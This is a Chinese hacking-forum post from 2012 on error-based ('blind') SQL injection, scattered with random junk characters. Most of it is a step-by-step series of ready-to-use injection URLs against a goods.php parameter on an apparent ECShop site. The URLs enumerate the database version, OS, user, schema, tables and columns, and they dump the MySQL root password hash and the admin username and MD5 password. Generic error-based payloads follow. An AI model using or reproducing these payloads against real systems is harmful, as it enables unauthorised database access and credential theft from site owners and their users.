找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2068|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
$ s' f7 g: [2 g# z- t" w% mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 J) t- z: O/ W' X' ~+ h1 o
6 e1 q& L) `: j
判断系统
7 ~3 c  S$ C* m+ V& Y4 r% [; E& B# H  a( O: `% F  h( T
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) O6 ^# T1 \+ ]' ?; d" g% S9 m9 a; W8 l
3 O1 E# {9 f9 ^

# `( S3 Q9 w) V6 I- [1 h8 e0 S! _当前 user()
, ?/ ?7 J8 V: X3 n5 m; f
! B7 i0 R; g, G' l- M9 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% @4 f3 V  _3 c/ p5 k8 s
5 a) b5 I0 p* M0 A. @7 Z
8 w1 ]" h; D4 n) a; M: I, Z5 q  e
$ I4 X4 T0 ?" Z2 W6 D
当前 database()
$ g. A$ }9 ^4 f6 C+ |2 z" }http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 B4 l' V5 q! m- ?
5 [% M% m2 K# o" V

$ q  N( O4 d; n& v5 F4 O4 D! R3 D# T" Q+ u* c" [/ n$ F
1 h, l3 O+ B. s1 b' `3 G
root hash; X) B2 v/ E! r& D# a# o$ K

! g7 B: b5 e) Q. b2 L: ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. e# u# w  A! @) J9 t! z0 n/ D2 A, d# v) j1 F$ i
) Z0 f6 Y7 U9 e3 v; z6 P; O2 U
1 x# k5 P) g; E" Q
当前 数据库表名
1 ]/ S! E9 n' m5 u+ N2 U& G' t! o, H5 f3 t1 S1 `. l# Q$ _( ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 a7 x% _% n7 v5 b- B$ F) n
# S' {# V/ r* Y9 _( J% Z/ F( D

: P& j% i2 f0 \, d$ W9 @2 y  _( g8 b) `% z; d# T6 B
当前 数据库 user_name 字段
" j8 d3 @" U+ p: Q( F" [- v& g7 X( u+ G( ^6 R, u* J
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 i. r% [( [3 q, R3 R: x
) p  r/ w! Q1 `+ z9 |% u* l9 W4 ?
当前 数据库 字段 password
% [# w! A: C! f/ Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ x! p2 V0 ^1 R! W
6 E. `  V# u1 j+ a6 {: c" ]' V

. s/ U7 D6 V- [! j! @
# [" g1 G# n  R, N3 X% b/ |5 S; h获得 admin passwd(md5)
2 B4 Y% G6 B; B0 T5 E! d( z0 l, r: {1 X% ?! G0 U$ c

5 E( B4 Z, h8 y2 O8 ]0 ~9 [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 E0 f2 q1 Q# A4 w, Y( Z0 K
+ d1 T7 _% @+ N) h8 Q  h
报错注射2 K; Z' f% m% j
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)/ C4 m0 k4 u& K4 _  M* ]/ Y+ c  I( o
8 Y, g( h9 |0 I# M, C
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)1 U7 z! }0 [( x, N" r  \3 y
( @# [( Q6 p, V
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表